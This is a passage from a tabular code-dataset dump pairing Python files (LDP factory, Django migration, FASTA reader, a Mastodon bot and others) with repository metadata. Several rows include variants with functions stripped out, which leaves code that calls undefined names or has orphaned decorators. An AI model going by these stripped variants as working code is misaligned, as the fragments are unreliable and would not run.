] | null | null | null | lakesuperior/model/ldp_factory.py | mbklein/lakesuperior | 5829a337bfd4120c6a8fa65ff4cd219f8690210a | [
"Apache-2.0"
] | null | null | null | lakesuperior/model/ldp_factory.py | mbklein/lakesuperior | 5829a337bfd4120c6a8fa65ff4cd219f8690210a | [
"Apache-2.0"
] | null | null | null | import logging
from pprint import pformat
from uuid import uuid4
from rdflib import Graph, parser, plugin, serializer
from rdflib.resource import Resource
from rdflib.namespace import RDF
from lakesuperior.model.ldpr import Ldpr
from lakesuperior.model.ldp_nr import LdpNr
from lakesuperior.model.ldp_rs import LdpRs, Ldpc, LdpDc, LdpIc
from lakesuperior.config_parser import config
from lakesuperior.env import env
from lakesuperior.dictionaries.namespaces import ns_collection as nsc
from lakesuperior.exceptions import (
IncompatibleLdpTypeError, InvalidResourceError, ResourceExistsError,
ResourceNotExistsError, TombstoneError)
LDP_NR_TYPE = nsc['ldp'].NonRDFSource
LDP_RS_TYPE = nsc['ldp'].RDFSource
rdfly = env.app_globals.rdfly
logger = logging.getLogger(__name__)
class LdpFactory:
'''
Generate LDP instances.
The instance classes are based on provided client data or on stored data.
'''
@staticmethod
@staticmethod
def from_stored(uid, repr_opts={}, **kwargs):
'''
Create an instance for retrieval purposes.
This factory method creates and returns an instance of an LDPR subclass
based on information that needs to be queried from the underlying
graph store.
N.B. The resource must exist.
@param uid UID of the instance.
'''
#logger.info('Retrieving stored resource: {}'.format(uid))
imr_urn = nsc['fcres'][uid]
rsrc_meta = rdfly.get_metadata(uid)
#logger.debug('Extracted metadata: {}'.format(
# pformat(set(rsrc_meta.graph))))
rdf_types = set(rsrc_meta.graph[imr_urn : RDF.type])
if LDP_NR_TYPE in rdf_types:
logger.info('Resource is a LDP-NR.')
rsrc = LdpNr(uid, repr_opts, **kwargs)
elif LDP_RS_TYPE in rdf_types:
logger.info('Resource is a LDP-RS.')
rsrc = LdpRs(uid, repr_opts, **kwargs)
else:
raise ResourceNotExistsError(uid)
# Sneak in the already extracted metadata to save a query.
rsrc._metadata = rsrc_meta
return rsrc
@staticmethod
def from_provided(uid, mimetype, stream=None, **kwargs):
'''
Determine LDP type from request content.
@param uid (string) UID of the resource to be created or updated.
@param mimetype (string) The provided content MIME type.
@param stream (IOStream | None) The provided data stream. This can be
RDF or non-RDF content, or None. In the latter case, an empty container
is created.
'''
uri = nsc['fcres'][uid]
if not stream:
# Create empty LDPC.
logger.info('No data received in request. '
'Creating empty container.')
inst = Ldpc(uid, provided_imr=Resource(Graph(), uri), **kwargs)
elif __class__.is_rdf_parsable(mimetype):
# Create container and populate it with provided RDF data.
input_rdf = stream.read()
gr = Graph().parse(data=input_rdf, format=mimetype, publicID=uri)
#logger.debug('Provided graph: {}'.format(
# pformat(set(provided_gr))))
provided_imr = Resource(gr, uri)
# Determine whether it is a basic, direct or indirect container.
if Ldpr.MBR_RSRC_URI in gr.predicates() and \
Ldpr.MBR_REL_URI in gr.predicates():
if Ldpr.INS_CNT_REL_URI in gr.predicates():
cls = LdpIc
else:
cls = LdpDc
else:
cls = Ldpc
inst = cls(uid, provided_imr=provided_imr, **kwargs)
# Make sure we are not updating an LDP-RS with an LDP-NR.
if inst.is_stored and LDP_NR_TYPE in inst.ldp_types:
raise IncompatibleLdpTypeError(uid, mimetype)
if kwargs.get('handling', 'strict') != 'none':
inst._check_mgd_terms(inst.provided_imr.graph)
else:
# Create a LDP-NR and equip it with the binary file provided.
provided_imr = Resource(Graph(), uri)
inst = LdpNr(uid, stream=stream, mimetype=mimetype,
provided_imr=provided_imr, **kwargs)
# Make sure we are not updating an LDP-NR with an LDP-RS.
if inst.is_stored and LDP_RS_TYPE in inst.ldp_types:
raise IncompatibleLdpTypeError(uid, mimetype)
logger.info('Creating resource of type: {}'.format(
inst.__class__.__name__))
try:
types = inst.types
except (TombstoneError, ResourceNotExistsError):
types = set()
return inst
@staticmethod
def is_rdf_parsable(mimetype):
'''
Checks whether a MIME type support RDF parsing by a RDFLib plugin.
@param mimetype (string) MIME type to check.
'''
try:
plugin.get(mimetype, parser.Parser)
except plugin.PluginException:
return False
else:
return True
@staticmethod
def is_rdf_serializable(mimetype):
'''
Checks whether a MIME type support RDF serialization by a RDFLib plugin
@param mimetype (string) MIME type to check.
'''
try:
plugin.get(mimetype, serializer.Serializer)
except plugin.PluginException:
return False
else:
return True
@staticmethod
def mint_uid(parent_uid, path=None):
'''
Mint a new resource UID based on client directives.
This method takes a parent ID and a tentative path and returns an LDP
resource UID.
This may raise an exception resulting in a 404 if the parent is not
found or a 409 if the parent is not a valid container.
@param parent_uid (string) UID of the parent resource. It must be an
existing LDPC.
@param path (string) path to the resource, relative to the parent.
@return string The confirmed resource UID. This may be different from
what has been indicated.
'''
if path and path.startswith('/'):
raise ValueError('Slug cannot start with a slash.')
# Shortcut!
if not path and parent_uid == '/':
return '/' + split_if_legacy(str(uuid4()))
if not parent_uid.startswith('/'):
raise ValueError('Invalid parent UID: {}'.format(parent_uid))
parent = LdpFactory.from_stored(parent_uid)
if nsc['ldp'].Container not in parent.types:
raise InvalidResourceError(parent_uid,
'Parent {} is not a container.')
pfx = parent_uid.rstrip('/') + '/'
if path:
cnd_uid = pfx + path
if not rdfly.ask_rsrc_exists(cnd_uid):
return cnd_uid
return pfx + split_if_legacy(str(uuid4()))
| 33.345291 | 79 | 0.612561 | import logging
from pprint import pformat
from uuid import uuid4
from rdflib import Graph, parser, plugin, serializer
from rdflib.resource import Resource
from rdflib.namespace import RDF
from lakesuperior.model.ldpr import Ldpr
from lakesuperior.model.ldp_nr import LdpNr
from lakesuperior.model.ldp_rs import LdpRs, Ldpc, LdpDc, LdpIc
from lakesuperior.config_parser import config
from lakesuperior.env import env
from lakesuperior.dictionaries.namespaces import ns_collection as nsc
from lakesuperior.exceptions import (
IncompatibleLdpTypeError, InvalidResourceError, ResourceExistsError,
ResourceNotExistsError, TombstoneError)
LDP_NR_TYPE = nsc['ldp'].NonRDFSource
LDP_RS_TYPE = nsc['ldp'].RDFSource
rdfly = env.app_globals.rdfly
logger = logging.getLogger(__name__)
class LdpFactory:
'''
Generate LDP instances.
The instance classes are based on provided client data or on stored data.
'''
@staticmethod
def new_container(uid):
if not uid.startswith('/') or uid == '/':
raise InvalidResourceError(uid)
if rdfly.ask_rsrc_exists(uid):
raise ResourceExistsError(uid)
rsrc = Ldpc(uid, provided_imr=Resource(Graph(), nsc['fcres'][uid]))
return rsrc
@staticmethod
def from_stored(uid, repr_opts={}, **kwargs):
'''
Create an instance for retrieval purposes.
This factory method creates and returns an instance of an LDPR subclass
based on information that needs to be queried from the underlying
graph store.
N.B. The resource must exist.
@param uid UID of the instance.
'''
#logger.info('Retrieving stored resource: {}'.format(uid))
imr_urn = nsc['fcres'][uid]
rsrc_meta = rdfly.get_metadata(uid)
#logger.debug('Extracted metadata: {}'.format(
# pformat(set(rsrc_meta.graph))))
rdf_types = set(rsrc_meta.graph[imr_urn : RDF.type])
if LDP_NR_TYPE in rdf_types:
logger.info('Resource is a LDP-NR.')
rsrc = LdpNr(uid, repr_opts, **kwargs)
elif LDP_RS_TYPE in rdf_types:
logger.info('Resource is a LDP-RS.')
rsrc = LdpRs(uid, repr_opts, **kwargs)
else:
raise ResourceNotExistsError(uid)
# Sneak in the already extracted metadata to save a query.
rsrc._metadata = rsrc_meta
return rsrc
@staticmethod
def from_provided(uid, mimetype, stream=None, **kwargs):
'''
Determine LDP type from request content.
@param uid (string) UID of the resource to be created or updated.
@param mimetype (string) The provided content MIME type.
@param stream (IOStream | None) The provided data stream. This can be
RDF or non-RDF content, or None. In the latter case, an empty container
is created.
'''
uri = nsc['fcres'][uid]
if not stream:
# Create empty LDPC.
logger.info('No data received in request. '
'Creating empty container.')
inst = Ldpc(uid, provided_imr=Resource(Graph(), uri), **kwargs)
elif __class__.is_rdf_parsable(mimetype):
# Create container and populate it with provided RDF data.
input_rdf = stream.read()
gr = Graph().parse(data=input_rdf, format=mimetype, publicID=uri)
#logger.debug('Provided graph: {}'.format(
# pformat(set(provided_gr))))
provided_imr = Resource(gr, uri)
# Determine whether it is a basic, direct or indirect container.
if Ldpr.MBR_RSRC_URI in gr.predicates() and \
Ldpr.MBR_REL_URI in gr.predicates():
if Ldpr.INS_CNT_REL_URI in gr.predicates():
cls = LdpIc
else:
cls = LdpDc
else:
cls = Ldpc
inst = cls(uid, provided_imr=provided_imr, **kwargs)
# Make sure we are not updating an LDP-RS with an LDP-NR.
if inst.is_stored and LDP_NR_TYPE in inst.ldp_types:
raise IncompatibleLdpTypeError(uid, mimetype)
if kwargs.get('handling', 'strict') != 'none':
inst._check_mgd_terms(inst.provided_imr.graph)
else:
# Create a LDP-NR and equip it with the binary file provided.
provided_imr = Resource(Graph(), uri)
inst = LdpNr(uid, stream=stream, mimetype=mimetype,
provided_imr=provided_imr, **kwargs)
# Make sure we are not updating an LDP-NR with an LDP-RS.
if inst.is_stored and LDP_RS_TYPE in inst.ldp_types:
raise IncompatibleLdpTypeError(uid, mimetype)
logger.info('Creating resource of type: {}'.format(
inst.__class__.__name__))
try:
types = inst.types
except (TombstoneError, ResourceNotExistsError):
types = set()
return inst
@staticmethod
def is_rdf_parsable(mimetype):
'''
Checks whether a MIME type support RDF parsing by a RDFLib plugin.
@param mimetype (string) MIME type to check.
'''
try:
plugin.get(mimetype, parser.Parser)
except plugin.PluginException:
return False
else:
return True
@staticmethod
def is_rdf_serializable(mimetype):
'''
Checks whether a MIME type support RDF serialization by a RDFLib plugin
@param mimetype (string) MIME type to check.
'''
try:
plugin.get(mimetype, serializer.Serializer)
except plugin.PluginException:
return False
else:
return True
@staticmethod
def mint_uid(parent_uid, path=None):
'''
Mint a new resource UID based on client directives.
This method takes a parent ID and a tentative path and returns an LDP
resource UID.
This may raise an exception resulting in a 404 if the parent is not
found or a 409 if the parent is not a valid container.
@param parent_uid (string) UID of the parent resource. It must be an
existing LDPC.
@param path (string) path to the resource, relative to the parent.
@return string The confirmed resource UID. This may be different from
what has been indicated.
'''
def split_if_legacy(uid):
if config['application']['store']['ldp_rs']['legacy_ptree_split']:
uid = tbox.split_uuid(uid)
return uid
if path and path.startswith('/'):
raise ValueError('Slug cannot start with a slash.')
# Shortcut!
if not path and parent_uid == '/':
return '/' + split_if_legacy(str(uuid4()))
if not parent_uid.startswith('/'):
raise ValueError('Invalid parent UID: {}'.format(parent_uid))
parent = LdpFactory.from_stored(parent_uid)
if nsc['ldp'].Container not in parent.types:
raise InvalidResourceError(parent_uid,
'Parent {} is not a container.')
pfx = parent_uid.rstrip('/') + '/'
if path:
cnd_uid = pfx + path
if not rdfly.ask_rsrc_exists(cnd_uid):
return cnd_uid
return pfx + split_if_legacy(str(uuid4()))
| 424 | 0 | 56 |
a086032583a7d966871c93679168cd50ce9d2707 | 26 | py | Python | statsd/_version.py | chartbeat/pystatsd | ab3c7f9aba4c0f1f0a7a263993de3a8253e0cdcc | [
"MIT"
] | null | null | null | statsd/_version.py | chartbeat/pystatsd | ab3c7f9aba4c0f1f0a7a263993de3a8253e0cdcc | [
"MIT"
] | null | null | null | statsd/_version.py | chartbeat/pystatsd | ab3c7f9aba4c0f1f0a7a263993de3a8253e0cdcc | [
"MIT"
] | null | null | null | __version__ = '2.0.2.1cb'
| 13 | 25 | 0.653846 | __version__ = '2.0.2.1cb'
| 0 | 0 | 0 |
04450a1c0e6ce83470bf3314bdf0f34a37f44338 | 171 | py | Python | encrypt algorithm.py | okengfernando/py-scripts | acaff7ce916772755ad4a0a7c0d89f713a94e4eb | [
"MIT"
] | 1 | 2020-02-13T22:56:49.000Z | 2020-02-13T22:56:49.000Z | encrypt algorithm.py | okengfernando/py-scripts | acaff7ce916772755ad4a0a7c0d89f713a94e4eb | [
"MIT"
] | null | null | null | encrypt algorithm.py | okengfernando/py-scripts | acaff7ce916772755ad4a0a7c0d89f713a94e4eb | [
"MIT"
] | null | null | null |
ID = input("Enter your 11 digit account number:") # 04230647978
encry = "*" * 5
start_ID = ID[0:4]
end_ID = ID[9:]
final_ID = start_ID + encry + end_ID
print(final_ID)
| 19 | 64 | 0.666667 |
ID = input("Enter your 11 digit account number:") # 04230647978
encry = "*" * 5
start_ID = ID[0:4]
end_ID = ID[9:]
final_ID = start_ID + encry + end_ID
print(final_ID)
| 0 | 0 | 0 |
0b3f80d55e934d8cc2d271e1e34c42e2ac660fc2 | 603 | py | Python | newpy-project/q11.py | adya1612/py-work | 7514b2e0449732e5c0d9d68d29775a9e0b2210bb | [
"MIT"
] | null | null | null | newpy-project/q11.py | adya1612/py-work | 7514b2e0449732e5c0d9d68d29775a9e0b2210bb | [
"MIT"
] | null | null | null | newpy-project/q11.py | adya1612/py-work | 7514b2e0449732e5c0d9d68d29775a9e0b2210bb | [
"MIT"
] | 1 | 2021-08-28T15:16:19.000Z | 2021-08-28T15:16:19.000Z | # to count the number of positive and negative numbers
invoke_function()
| 23.192308 | 69 | 0.668325 | # to count the number of positive and negative numbers
def count_positive_and_negative(user_number):
number = list(map(int, user_number.split()))
positive_count = 0
negative_count = 0
for i in number:
if i > 0:
positive_count += 1
else:
negative_count += 1
print(f"Total positive numbers: {positive_count}")
print(f"Total negative numbers: {negative_count}")
def invoke_function():
print("Enter the numbers. Hit SPACE. Don't hit ENTER.")
count_positive_and_negative(input("Enter the list of numbers: "))
invoke_function()
| 481 | 0 | 46 |
bbdb121c9650c856b1714c4861200caf6dcad0f2 | 1,312 | py | Python | src/model/healper.py | arahmatiiii/user_political | 740277a982c85179ebd048fb984d64e608aefc76 | [
"MIT"
] | null | null | null | src/model/healper.py | arahmatiiii/user_political | 740277a982c85179ebd048fb984d64e608aefc76 | [
"MIT"
] | null | null | null | src/model/healper.py | arahmatiiii/user_political | 740277a982c85179ebd048fb984d64e608aefc76 | [
"MIT"
] | null | null | null | import torch
import itertools
from pytorch_lightning.callbacks import ModelCheckpoint
from data_preparation import token_padding, characters_padding
| 36.444444 | 107 | 0.679878 | import torch
import itertools
from pytorch_lightning.callbacks import ModelCheckpoint
from data_preparation import token_padding, characters_padding
def build_checkpoint_callback(save_top_k, monitor, mode, filename='QTag-{epoch:02d}-{val_loss:.2f}'):
# saves a file like: input/QTag-epoch=02-val_loss=0.32.ckpt
checkpoint_callback = ModelCheckpoint(
monitor=monitor, # monitored quantity
filename=filename,
save_top_k=save_top_k, # save the top k models
mode=mode, # mode of the monitored quantity for optimization
)
return checkpoint_callback
def pad_collator(batch, pad_idx):
batch_temp = dict()
batch_keys = batch[0].keys()
for item in batch_keys:
if 'target' in item:
padded_temp = torch.tensor(list(itertools.chain(*[batch[i][item] for i in range(len(batch))])))
elif 'char' in item:
temp = [batch[i][item] for i in range(len(batch))]
padded_temp = characters_padding(temp, pad_index=pad_idx)
padded_temp = [torch.tensor(sample) for sample in padded_temp]
else:
temp = [batch[i][item] for i in range(len(batch))]
padded_temp = torch.tensor(token_padding(temp, pad_index=pad_idx))
batch_temp[item] = padded_temp
return batch_temp
| 1,114 | 0 | 46 |
fa19d12dca6a816223eb3a8485a272181647d560 | 2,629 | py | Python | accelerator/migrations/0017_add_required_name.py | masschallenge/django-accelerator | 8af898b574be3b8335edc8961924d1c6fa8b5fd5 | [
"MIT"
] | 6 | 2017-06-14T19:34:01.000Z | 2020-03-08T07:16:59.000Z | accelerator/migrations/0017_add_required_name.py | masschallenge/django-accelerator | 8af898b574be3b8335edc8961924d1c6fa8b5fd5 | [
"MIT"
] | 160 | 2017-06-20T17:12:13.000Z | 2022-03-30T13:53:12.000Z | accelerator/migrations/0017_add_required_name.py | masschallenge/django-accelerator | 8af898b574be3b8335edc8961924d1c6fa8b5fd5 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.10 on 2020-04-08 11:18
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
| 33.278481 | 74 | 0.586535 | # Generated by Django 2.2.10 on 2020-04-08 11:18
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('accelerator', '0016_make_user_role_name_unique'),
]
operations = [
migrations.AlterField(
model_name='program',
name='cycle',
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name='programs',
to=settings.ACCELERATOR_PROGRAMCYCLE_MODEL
),
),
migrations.AlterField(
model_name='program',
name='end_date',
field=models.DateTimeField(default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AlterField(
model_name='program',
name='location',
field=models.CharField(default='', max_length=50),
preserve_default=False,
),
migrations.AlterField(
model_name='program',
name='start_date',
field=models.DateTimeField(default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AlterField(
model_name='programcycle',
name='advertised_final_deadline',
field=models.DateTimeField(default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AlterField(
model_name='programcycle',
name='application_final_deadline_date',
field=models.DateTimeField(default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AlterField(
model_name='programcycle',
name='application_open_date',
field=models.DateTimeField(default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AlterField(
model_name='programcycle',
name='default_application_type',
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name='application_type_for',
to=settings.ACCELERATOR_APPLICATIONTYPE_MODEL
),
),
migrations.AlterField(
model_name='programcycle',
name='short_name',
field=models.CharField(default='', max_length=32),
preserve_default=False,
),
]
| 0 | 2,419 | 23 |
e47bcb6f461f04971bd42b6d1f461b2e19c67c15 | 4,236 | py | Python | scripts/chimera_lib/fasta.py | dekkerlab/chimera-tie | ff9e1fe090ac9356b37e552457fdc868b659d6b2 | [
"Apache-2.0"
] | null | null | null | scripts/chimera_lib/fasta.py | dekkerlab/chimera-tie | ff9e1fe090ac9356b37e552457fdc868b659d6b2 | [
"Apache-2.0"
] | null | null | null | scripts/chimera_lib/fasta.py | dekkerlab/chimera-tie | ff9e1fe090ac9356b37e552457fdc868b659d6b2 | [
"Apache-2.0"
] | null | null | null | from sys import stdin
### Fasta Reading Functions ###############
#################################################################################################################
#################################################################################################################
| 35.3 | 118 | 0.493154 | from sys import stdin
### Fasta Reading Functions ###############
class FastaEntry:
def __init__(self , header , sequence ):
if header[0] == ">":
header = header[1:]
self.header = header
self.sequence = sequence
def reverse_complement(self):
complements = {"A" : "T" , "a" : "t" ,
"C" : "G" , "c" : "g" ,
"G" : "C" , "g" : "c" ,
"T" : "A" , "t" : "a" ,
"N" : "N" , "n" : "n"}
result = list()
for i in range(len(self.sequence) - 1 , -1 , -1 ):
try:
result.append(complements[self.sequence[i]])
except IndexError:
error_message = "Invalid character (%s) in the fasta sequence with header \n" \
"%s"%(self.sequence[i] , self.header)
raise IOError(error_message)
self.sequence = "".join(result)
def __str__(self ):
chunk_size = 50
result_list = [ ">" + self.header ]
sequence_size = len(self.sequence)
number_of_remaining_letters = sequence_size
number_of_processed_letters = 0
while number_of_remaining_letters > 0:
if number_of_remaining_letters <= chunk_size:
result_list.append(self.sequence[ number_of_processed_letters : ])
number_of_remaining_letters = 0
number_of_processed_letters = sequence_size
else:
new_number_of_processed_letters = number_of_processed_letters + chunk_size
result_list.append(self.sequence[ number_of_processed_letters : new_number_of_processed_letters])
number_of_remaining_letters -= chunk_size
number_of_processed_letters = new_number_of_processed_letters
return("\n".join( result_list ) )
#################################################################################################################
class FastaFile:
def __init__(self , file):
if(file):
self.f = open(file , "r")
else:
self.f = stdin
self.current_header = ""
self.current_sequence = list()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def __getitem__(self, index):
for raw_line in self.f:
line = raw_line.strip()
if not line:
this_entry = FastaEntry(header = self.current_header , sequence = "".join(self.current_sequence) )
return(this_entry)
if line[0] == ">":
if not self.current_header:
self.current_header = line
self.current_sequence = list()
else:
this_entry = FastaEntry(header = self.current_header , sequence = "".join(self.current_sequence) )
self.current_header = line
self.current_sequence = list()
return(this_entry)
else:
self.current_sequence.append(line)
# this returns the last entry
if len(self.current_sequence) > 0:
this_entry = FastaEntry(header = self.current_header , sequence = "".join(self.current_sequence) )
self.current_sequence = list()
return(this_entry)
raise IndexError
def __del__(self):
self.f.close()
#################################################################################################################
def reverse_complement(input_sequence):
complements = {"A" : "T" , "a" : "t" ,
"C" : "G" , "c" : "g" ,
"G" : "C" , "g" : "c" ,
"T" : "A" , "t" : "a" ,
"N" : "N" , "n" : "n"}
result = list()
for i in range(len(input_sequence) - 1 , -1 , -1 ):
try:
result.append(complements[input_sequence[i]])
except IndexError:
error_message = "Invalid character (%s) in the sequence "\
%(input_sequence[i])
raise IOError(error_message)
return "".join(result)
| 3,659 | -9 | 283 |
3cdc8e1b34c40a84ac79c2f751d330fd05a93c4e | 164 | py | Python | preprocess/test.py | dyy401453043/IRNet | d1c6f8df4646ca40a3c0317076a84e8cdb83870f | [
"MIT"
] | null | null | null | preprocess/test.py | dyy401453043/IRNet | d1c6f8df4646ca40a3c0317076a84e8cdb83870f | [
"MIT"
] | null | null | null | preprocess/test.py | dyy401453043/IRNet | d1c6f8df4646ca40a3c0317076a84e8cdb83870f | [
"MIT"
] | null | null | null | import nltk
from nltk import data
data.path.append(r'D:\NL2SQL\nltk_data')
#from nltk.book import *
tokenizer = nltk.data.load('tokenizers/punkt/english.pickle') | 20.5 | 61 | 0.768293 | import nltk
from nltk import data
data.path.append(r'D:\NL2SQL\nltk_data')
#from nltk.book import *
tokenizer = nltk.data.load('tokenizers/punkt/english.pickle') | 0 | 0 | 0 |
860932d4156ec08484ca83dfffd810bd32c8411f | 1,004 | py | Python | tests/gcc/gcc_bin_test.py | sahirgomez1/CompilerGym | 9987fbdfcf8ac9af076baf0ffd695e48f0e804cf | [
"MIT"
] | 562 | 2020-12-21T14:10:20.000Z | 2022-03-31T21:23:55.000Z | tests/gcc/gcc_bin_test.py | sahirgomez1/CompilerGym | 9987fbdfcf8ac9af076baf0ffd695e48f0e804cf | [
"MIT"
] | 433 | 2020-12-22T03:40:41.000Z | 2022-03-31T18:16:17.000Z | tests/gcc/gcc_bin_test.py | sahirgomez1/CompilerGym | 9987fbdfcf8ac9af076baf0ffd695e48f0e804cf | [
"MIT"
] | 88 | 2020-12-22T08:22:00.000Z | 2022-03-20T19:00:40.000Z | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""Tests for the GCC CompilerGym service."""
import gym
import pytest
import compiler_gym.envs.gcc # noqa register environments
from compiler_gym.service import ServiceError
from tests.pytest_plugins.gcc import with_system_gcc, without_system_gcc
from tests.test_main import main
@with_system_gcc
@without_system_gcc
if __name__ == "__main__":
main()
| 25.74359 | 72 | 0.734064 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""Tests for the GCC CompilerGym service."""
import gym
import pytest
import compiler_gym.envs.gcc # noqa register environments
from compiler_gym.service import ServiceError
from tests.pytest_plugins.gcc import with_system_gcc, without_system_gcc
from tests.test_main import main
def test_missing_gcc_bin():
with pytest.raises(ServiceError):
gym.make("gcc-v0", gcc_bin="not-a-real-file")
def test_invalid_gcc_bin():
with pytest.raises(ServiceError):
gym.make("gcc-v0", gcc_bin="false")
@with_system_gcc
def test_system_gcc():
with gym.make("gcc-v0", gcc_bin="gcc") as env:
assert "gcc" in env.compiler_version
@without_system_gcc
def test_missing_system_gcc():
with pytest.raises(ServiceError):
gym.make("gcc-v0", gcc_bin="gcc")
if __name__ == "__main__":
main()
| 372 | 0 | 90 |
d7a5618562bc73b14d44a2a51ee851bf97f4f032 | 5,600 | py | Python | MainInterface.py | DwardEE/nucleotide-sequence-num-converter | edb77c78f8ac5bd7feb1e9b368572617c44d4886 | [
"MIT"
] | null | null | null | MainInterface.py | DwardEE/nucleotide-sequence-num-converter | edb77c78f8ac5bd7feb1e9b368572617c44d4886 | [
"MIT"
] | null | null | null | MainInterface.py | DwardEE/nucleotide-sequence-num-converter | edb77c78f8ac5bd7feb1e9b368572617c44d4886 | [
"MIT"
] | null | null | null | import DataTranslate
if __name__ == "__main__":
main()
| 37.333333 | 81 | 0.505893 | import DataTranslate
def quad_array(sequence):
final = []
for i in range(len(sequence)):
if sequence[i] == "A":
final.append(0)
elif sequence[i] == "C":
final.append(1)
elif sequence[i] == "G":
final.append(2)
elif sequence[i] == "T" or i == "U":
final.append(3)
else:
return "invalid"
return final
def write_file(sequence, name, filename):
f = open(filename, "a")
f.write(">" + name + "\n")
for i in range(0, len(sequence), 70):
f.write(sequence[i:i+70] + "\n")
f.close()
def quaternary_translator():
nucleotide_header = ""
seq = []
while True:
method = input("Select method of input, (f)ile (c)onsole: ")
if method == "c" or method == "f":
break
if method == "e":
quit()
if method == "c":
while True:
nucleotide_header = input("Enter the nucleotide sequence's "
"name: ")
if nucleotide_header == "e":
quit()
seq = quad_array(input("Enter the nucleotide sequence: "))
if seq == "e":
quit()
if seq != "invalid":
break
elif method == "f":
seq_string = ""
while True:
filename = input("Enter filename: ")
if filename == "e":
quit()
f = open(filename, "r")
if f.mode == "r":
break
f1 = f.readlines()
nucleotide_header = f1[0][1:-1]
for i in range(1, len(f1)):
seq_string = seq_string + f1[i][:-1]
seq = quad_array(seq_string)
while True:
choice = input(
"Enter the base translation: (q2d) quaternary to decimal, "
"(q2b) quaternary to binary, (q2h) quaternary to hexadecimal ("
"r)eturn array: ")
if choice == "q2b":
print(nucleotide_header + " Binary Form/Base 2")
print(DataTranslate.q2b_translation(seq))
write_input = input(
"Would you like to write the results to a file? (y) or (n) ")
if write_input == "e" or write_input == "n":
quit()
if write_input == "y":
filename = input("Which file do you want to write to? ")
write_file(DataTranslate.q2b_translation(seq),
nucleotide_header, filename)
elif choice == "q2d":
print(nucleotide_header + " Decimal Form/Base 10 (value, "
"sequence length)")
print(DataTranslate.q2d_translation(seq))
write_input = input(
"Would you like to write the results to a file? (y) or (n) ")
if write_input == "e" or write_input == "n":
quit()
elif write_input == "y":
filename = input("Which file do you want to write to? ")
write_file(DataTranslate.q2d_translation(seq),
nucleotide_header, filename)
elif choice == "q2h":
print(nucleotide_header + " Hexadecimal Form/Base 16(value, "
"sequence length)")
print(DataTranslate.q2h_translation(seq))
write_input = input(
"Would you like to write the results to a file? (y) or (n) ")
if write_input == "e" or write_input == "n":
quit()
elif write_input == "y":
filename = input("Which file do you want to write to? ")
write_file(DataTranslate.q2h_translation(seq),
nucleotide_header, filename)
elif choice == "r":
print(nucleotide_header + " Quaternary Array/Base 4 Array")
print(seq)
elif choice == "e":
quit()
else:
print("Invalid input")
def translate2quaternary():
nucleotide_header = input("Enter the name of the nucleotide sequence: ")
if nucleotide_header == "e":
quit()
base = input("Which base would you like to translate from (2), (10), "
"(16): ")
if base == "e":
quit()
elif base == "10":
seq = input("Please input the decimal string: ")
length = input("Please input the sequence length: ")
print(">" + nucleotide_header)
print(DataTranslate.d2q_translation(int(seq), int(length)))
elif base == "16":
seq = input("Please input the hexadecimal string: ")
length = input("Please input the sequence length: ")
print(">" + nucleotide_header)
print(DataTranslate.h2q_translation(int(seq), int(length)))
elif base == "2":
seq = input("Please input the binary string: ")
print(">" + nucleotide_header)
print(DataTranslate.b2q_translation(seq))
def main():
print("Welcome to ProjectA!")
print("Enter (e) at any time to exit")
mode = input("Nucleotide sequence (t)ranslation or translation to ("
"q)uaternary nucleotide sequence: ")
if mode == "t":
print("File input should be in FASTA *.txt format, while console input "
"will be in raw nucleotide sequence")
quaternary_translator()
elif mode == "q":
translate2quaternary()
if __name__ == "__main__":
main()
| 5,399 | 0 | 125 |
db3ff0290d7b1dd8b959965512f11ef3d7a7662c | 6,165 | py | Python | start_mastodon.py | Czino/bitcoin-is-the-sun | 54181f135b89b083d0a3739754d869f110f733b4 | [
"MIT"
] | 2 | 2020-10-26T21:35:59.000Z | 2020-11-13T18:32:51.000Z | start_mastodon.py | Czino/bitcoin-is-the-sun | 54181f135b89b083d0a3739754d869f110f733b4 | [
"MIT"
] | null | null | null | start_mastodon.py | Czino/bitcoin-is-the-sun | 54181f135b89b083d0a3739754d869f110f733b4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import logging
import sys
import cv2
import time
import os.path
from PIL import Image
import imageUtils
import videoUtils
import numpy
import requests
from mastodon import Mastodon
import config_mastodon as cf
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
dirname = os.path.dirname(__file__)
mastodon = Mastodon(
client_id = cf.credentials['consumer_key'],
client_secret = cf.credentials['consumer_secret'],
access_token = cf.credentials['access_token'],
api_base_url = cf.credentials['base_url']
)
mastodon.log_in(
username = cf.credentials['login'],
password = cf.credentials['password'],
scopes = ['read', 'write']
)
if not os.path.isfile(os.path.join(dirname, 'sinceId_mastodon.txt')):
with open(os.path.join(dirname, 'sinceId_mastodon.txt'), 'w') as saveFile:
saveFile.write('1')
while True:
with open(os.path.join(dirname, 'sinceId_mastodon.txt'), 'r') as readFile:
sinceId = readFile.read()
sinceId = int(sinceId)
sinceId = checkMentions(mastodon, ['light', 'sparkles'], sinceId)
with open(os.path.join(dirname, 'sinceId_mastodon.txt'), 'w') as saveFile:
saveFile.write(str(sinceId))
logger.info('Waiting...')
time.sleep(120) | 36.916168 | 113 | 0.530089 | #!/usr/bin/env python3
import logging
import sys
import cv2
import time
import os.path
from PIL import Image
import imageUtils
import videoUtils
import numpy
import requests
from mastodon import Mastodon
import config_mastodon as cf
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
dirname = os.path.dirname(__file__)
mastodon = Mastodon(
client_id = cf.credentials['consumer_key'],
client_secret = cf.credentials['consumer_secret'],
access_token = cf.credentials['access_token'],
api_base_url = cf.credentials['base_url']
)
mastodon.log_in(
username = cf.credentials['login'],
password = cf.credentials['password'],
scopes = ['read', 'write']
